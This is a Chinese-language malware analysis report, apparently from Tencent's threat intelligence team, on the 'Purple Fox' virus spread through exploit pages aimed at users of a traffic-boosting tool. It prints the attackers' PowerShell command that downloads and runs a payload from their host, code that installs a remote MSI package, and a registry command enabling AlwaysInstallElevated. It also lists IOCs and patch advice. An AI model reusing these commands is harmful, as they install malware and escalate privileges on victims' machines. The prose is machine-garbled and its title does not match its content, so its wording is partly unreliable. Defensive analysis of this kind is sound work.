CVE-2019-1367 | 脚本发动机内存损坏漏洞预警更新,腾讯安全发布漏洞修复工具
腾讯平安御见威胁情报中心检测到刷量软件“流量宝流量版”通过挂马攻击流传“紫狐”病毒。那些使用“流量宝流量版”刷量的电脑因熏染紫狐病毒,被强制推装多款软件。我们的监测数据解释,攻击当天有数千台电脑中毒,主要漫衍在广东、江苏、浙江等地。一、靠山
近日,腾讯平安御见威胁情报中心检测到刷量软件“流量宝流量版”流传挂马攻击“紫狐”病毒。使用流量宝流量版刷量的计算机因感染紫狐病毒而被迫安装多种软件。我们的监测数据解释说,攻击当天有数千台计算机中毒,主要是在广东、江苏、浙江等地。
攻击的特点是在病毒传播和安装过程中行使大量已知系统缺陷,例如在挂马攻击页面上行使IE远程代码执行缺陷(CVE-2014-6332)和IE及Office“双杀”破绽(CVE-2018-8373),挂马攻击乐成后安装“紫狐”病毒母体MSI安装前行使多个包Windows系统权限提升缺陷(MS15-051、MS16-032、CVE-2018-8120)提高过程执行权限。
幸运的是,流行迎的网民几乎不会自动使用流量宝藏流量版等工具,受害者大多是计划网络刷的从业者。因此,病毒攻击对受欢迎的网民影响不大。攻击者对各种系统缺陷的行使技能值得关注。企业网络管理可以通过腾讯皇家高级威胁检测系统实时发现行使缺陷的攻击行为。
流量宝流量版挂马攻击流程图
根据腾讯平安威胁情报中心的监控数据,攻击趋势出现“脉冲式”特征,攻击流量2019-9-10日最先,在2019-9-11日到岑岭,然后迅速回落,直到挂马页关闭。
广东、江苏、浙江是受攻击影响最严重的三个地区。
2.详细分析
IE破绽攻击
流量宝流量版.exe请求页面有缺陷hxxp://dh.zfyqza.com/1.htm,该页面中包罗攻击者经心组织的IE远程代码执行缺陷(CVE-2014-6332)行使攻击代码。
破绽攻击乐成后执行下令:
powershell.exe -nop -windowstyle hidden -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http[:]//dh.zfyqza.com/ps008.jpg')
流量宝流量版.exe请求的另一个攻击页面hxxp://dh.zfyqza.com/2.htm,黑客可以同时在页面中心组织Office和IE举行攻击的Windows VBScript Engine远程代码执行缺陷(CVE-2018-8373)行使代码。
破绽攻击乐成后执行远程代码http[:]//dh.zfyqza.com/hta.hta
然后在hta.hta中继续执行Powershell代码:http[:]//dh.zfyqza.com/ps008.jpg
病毒植入
ps008.jpg首先建立互斥体‘Global\ifqGpTzdTzhMJSOz’确保当前历程具有唯一实例。
接着通过Security.Principal.WindowsPrincipal工具来判断当前是否属于Administrator用户权限。
如果是现在Administrator用户权限由以下代码执行MSI安装历程。
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
public static class msi
{
[DllImport("msi.dll",CharSet=CharSet.Auto)]
public static extern int MsiInstallProduct(string packagePath,string commandLine);
[DllImport("msi.dll")]
public static extern int MsiSetInternalUI(int dwUILevel,IntPtr phWnd);
}
"@
[msi]::MsiSetInternalUI(2,0);
[msi]::MsiInstallProduct("http://dh.zfyqza.com/8QSgdmFQ4bGWIkbbP.jpg","")
}
若是不是Administrator用户权限通过下列注册表项的值使用AlwaysInstallElevated计划安装有提升(系统)权限的计划Windows Installer程序包。
"cmd /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f® add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f"
在上述两个注册表下AlwaysInstallElevated值未设置为“1”,安装托管应用程序应使用提升安装程序的权限。设置完成后,安装过程相同MSI包文件http[:]//dh.zfyqza.com/8QSgdmFQ4bGWIkbbP.jpg
Windows权限提升
在Powershell还将在代码中下载3个Windows权限提升缺陷模块载权限PE模块通过Invoke-ReflectiveDllInjection注入到Powershell在过程中执行,从而提高当前过程的执行权限,以便病毒MSI乐成安装在计算机上,安装文件。
MS15-051
模块下载地址:
hxxp://dh.zfyqza.com/1505164.jpg
hxxp://dh.zfyqza.com/1505132.jpg
破绽攻击代码:
MS16-032
模块下载地址:
IE浏览器存高危漏洞 腾讯安全发布修复工具全面防范企业安全
hxxp://dh.zfyqza.com/1603264.jpg
hxxp://dh.zfyqza.com/1603232.jpg
破绽攻击代码:
CVE-2018-8120
模块下载地址:
hxxp://dh.zfyqza.com/1808164.jpg
hxxp://dh.zfyqza.com/1808132.jpg
破绽攻击代码:
每次提权完成后,都会执行一段时间base64编码的Powershell为病毒举行代码MSI包文件安装过程。
紫狐病毒
在Powershell在代码中,安装最终病毒的下令是:
[msi]::MsiInstallProduct("http://dh.zfyqza.com/8QSgdmFQ4bGWIkbbP.jpg","")
8QSgdmFQ4bGWIkbbP.jpg实际上为MSI该文件是紫狐病毒的母体,具有以下特点:
1、病毒母体为MSI包,包文件中3有一个文件,有一个非PE文件(加密PE文件),另外两个是32位和64位的木马DLL;
2、通过系统PendingFileRenameOperations实现机制替换系统文件启动;
3、解密出DLL文件C:\Windows\SysWOW64\Ms8E422A00App.dll并建立服务启动;
4、释放驱动模块隐藏自己的行为,在后台推广安装各种软件,病毒通过恶意推广获利。
三、安全建议
1、实时维修系统高危缺陷:
修复破绽CVE-2014-6332
微软补丁地址:http://technet.microsoft.com/security/bulletin/MS14-064
修复破绽CVE-2018-8120
微软补丁地址:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120
修复破绽CVE-2018-8373
微软补丁地址:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373
2、阻止使用来历不明的刷量软件,使用前通过杀毒软件进行病毒扫描;
3、腾讯电脑管家推荐使用腾讯电脑管家/腾讯御点阻止了此类病毒的攻击。如果有招聘,也可以用电脑管家/腾讯御点对“紫狐”病毒清算。
4、推荐企业用户使用腾讯御界高级威胁检测系统检测种种可疑攻击行为,包罗种种破绽行使行为的检测。御界高级威胁检测系统,是基于腾讯反病毒实验室的平安能力、依托腾讯在云和端的海量数据,研发出的怪异威胁情报和恶意检测模子系统。
IOCs
Domain
dh.zfyqza.com
URL
hxxp://dh.zfyqza.com/1.htm
hxxp://dh.zfyqza.com/2.htm
hxxp://dh.zfyqza.com/hta.hta
hxxp://dh.zfyqza.com/ps008.jpg
hxxp://dh.zfyqza.com/8QSgdmFQ4bGWIkbbP.jpg
hxxp://dh.zfyqza.com/pe.jpg
hxxp://dh.zfyqza.com/1808164.jpg
hxxp://dh.zfyqza.com/1603264.jpg
hxxp://dh.zfyqza.com/1505164.jpg
hxxp://dh.zfyqza.com/1808132.jpg
hxxp://dh.zfyqza.com/1603232.jpg
hxxp://dh.zfyqza.com/1505132.jpg
md5
e5a505f7f319bcac16cd02a42d75702e
b8f72bf5ef16bbedf3b0d69e1b569ecf
d64d848165533fc7704d59aef9321ec6
de5de649e0821b0dd3dadfa8235416ea
6467874d952a5ffc1edfd7f05b1cc86d
ae3e7304122469f2de3ecbd920a768d1
4facb81f57e515a508040270849bcd35
1e11eb7eacf41bbba097e62b3d21f925
cc46d098e2af4f0e202ab76f167dabf3
5feca9944a8ec2fe6701ff7b6ed6ca86
参考链接:
https://www.freebuf.com/column/187317.html
http://www.360.cn/n/10386.html
https://www.seebug.org/vuldb/ssvid-92734
https://blog.trendmicro.com/trendlabs-security-intelligence/use-after-free-uaf-vulnerability-cve-2018-8373-in-vbscript-engine-affects-internet-explorer-to-run-shellcode/
微软10月发布安全更新,修复多个核心组件,腾讯御界支持检测